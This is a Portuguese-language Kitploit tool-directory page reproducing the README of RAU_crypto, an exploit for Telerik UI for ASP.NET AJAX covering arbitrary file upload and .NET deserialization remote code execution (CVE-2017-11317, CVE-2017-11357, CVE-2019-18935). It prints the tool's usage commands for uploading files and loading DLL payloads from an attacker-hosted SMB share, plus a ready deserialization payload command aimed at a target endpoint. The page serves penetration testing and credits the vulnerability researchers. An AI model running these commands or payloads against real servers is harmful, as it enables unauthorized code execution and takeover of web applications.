Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
RAU_crypto — Telerik UI para ASP.NET AJAX Upload de arquivo e exploração de desserialização .NET (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935) | Kitploit
Ferramentas/GitHubGitHub/bao7uo/rau_crypto
Ferramentas de Criptografia/DescriptografiaGeração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de Penetração
GitHubbao7uo/rau_crypto

RAU_crypto

Telerik UI para ASP.NET AJAX Upload de arquivo e exploração de desserialização .NET (CVE-2017-11317, CVE-2017-11357, CVE-2019-18935)

Ver Repositório
180502há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

RAU_crypto

Language

Exploit combinado para Telerik UI for ASP.NET AJAX.

  • Upload de arquivo para CVE-2017-11317 e CVE-2017-11357 - enviará o arquivo automaticamente
  • Desserialização .NET para CVE-2019-18935

Agora suporta testar a capacidade do alvo de buscar payloads remotos de um serviço SMB hospedado pelo atacante. Use Burp Collaborator e/ou Responder para facilitar o teste se os pré-requisitos necessários estão em vigor.

Para que a exploração funcione, você geralmente precisa de uma versão com chaves hard coded, ou precisa conhecer a chave, por exemplo, se puder divulgar o conteúdo do web.config. O exploit também permite descriptografia e criptografia diretas do rauPostData usado com Telerik.Web.UI.WebResource.axd?type=rau

Requisitos

  • python >= 3.6 com pycryptodome (https://www.pycryptodome.org/en/latest/src/installation.html) - instalado com pip3 install pycryptodome ou pip3 install pycryptodomex

Publicado no exploit-db (versão antiga)

  • https://www.exploit-db.com/exploits/43874/

Ver também

Meu outro exploit para Telerik UI (para CVE-2017-9248) provavelmente também será de interesse. Está disponível aqui:

  • https://github.com/bao7uo/dp_crypto

A fazer

  • Funcionalidade HMAC ausente para versões posteriores.
  • Capacidade de especificar chave personalizada.
  • Argumento de linha de comando para execução de uma dll de modo misto (entretanto, use o exemplo de payload de desserialização .NET fornecido abaixo).
  • Argumentos de linha de comando para testar a capacidade de e carregar dlls de modo misto hospedadas remotamente (SMB)
  • Utilitário separado para testar dll de modo misto.
  • Fornecer código-fonte/instruções de compilação para dll de modo misto.
  • Forçar versões por brute force.

Nota - os últimos quatro itens estão completos, mas não foram lançados.

Vulnerabilidades

A vulnerabilidade de upload de arquivo (CVE-2017-11317) foi descoberta por outras pessoas, acredito que os créditos sejam devidos a @straight_blast @pwntester @olekmirosh . Pouco depois de ser anunciada, encontrei a biblioteca Telerik durante o curso do meu trabalho, então pesquisei sobre ela e a vulnerabilidade e escrevi este exploit em julho de 2017. Também reportei a CVE-2017-11357 para a referência direta insegura a objeto relacionada.

https://www.telerik.com/support/kb/aspnet-ajax/upload-%28async%29/details/insecure-direct-object-reference

A vulnerabilidade de desserialização .NET (CVE-2019-18935) foi descoberta por @mwulftange.

https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization

Uso

root@kitploit:~
$ ./RAU_crypto.py -h

RAU_crypto by Paul Taylor / @bao7uo 
CVE-2017-11317, CVE-2019-18935 - Telerik RadAsyncUpload hardcoded keys / arbitrary file upload / .NET deserialisation

Usage:

Decrypt a ciphertext:               -d ciphertext
Decrypt rauPostData:                -D rauPostData
Encrypt a plaintext:                -e plaintext

Generate file upload rauPostData:   -E c:\\destination\\folder Version
Generate all file upload POST data: -p c:\\destination\\folder Version ../local/filename
Upload file:                        -P c:\\destination\\folder Version c:\\local\\filename url [proxy]

Generate custom payload POST data : -c partA partB
Send custom payload:                -C partA partB url [proxy]

Check remote SMB payload capability -r lhost url [proxy]

Load remote SMB dll payload         -R lhost/share/mixed_mode_assembly.dll url [proxy]\n\n" +
Trigger local uploaded dll payload  -L c:/users/public/documents/mixed_mode_assembly.dll url [proxy]\n\n" +

Example URL:               http://target/Telerik.Web.UI.WebResource.axd?type=rau
Example Version:           2016.2.504
Example optional proxy:    127.0.0.1:8080

N.B. Advanced settings e.g. custom keys or PBKDB algorithm can be found by searching source code for: ADVANCED_SETTINGS

$

Exemplo - descriptografia

Decrypt screenshot

Exemplo - upload arbitrário de arquivo

Upload screenshot

Payload personalizado (desserialização .NET)

Para detalhes sobre payloads personalizados para desserialização .NET, há um ótimo artigo de @mwulftange, que descobriu esta vulnerabilidade, no blog Code White no seguinte link.

  • https://codewhitesec.blogspot.com/2019/02/telerik-revisited.html

Atualização - Existe um exploit alternativo de Caleb Gross @noperator, que incorpora recursos deste exploit, com um ótimo artigo de blog explicando tudo. Agradecimentos também a Caleb por contribuir com o RAU_Crypto.

  • https://know.bishopfox.com/research/cve-2019-18935-remote-code-execution-in-telerik-ui

Outros links relevantes.

  • https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-JSON-Attacks-wp.pdf
  • https://threatvector.cylance.com/en_us/home/implications-of-loading-net-assemblies.html
  • https://thewover.github.io/Mixed-Assemblies/

Exemplo de payload de desserialização .NET:

root@kitploit:~
$ ./RAU_crypto.py -C '{"Path":"file:///c:/users/public/documents/mixedmode64.dll"}' 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a' http://target/Telerik.Web.UI.WebResource.axd?type=rau

Para DLL de modo misto, veja meu outro repositório no GitHub:

  • https://github.com/bao7uo/MixedUp

Agradecimento especial a @irsdl, que inspirou o recurso de payload personalizado.

Crédito a @rwincey, que inspirou o recurso de dll remota.

Baixar ferramenta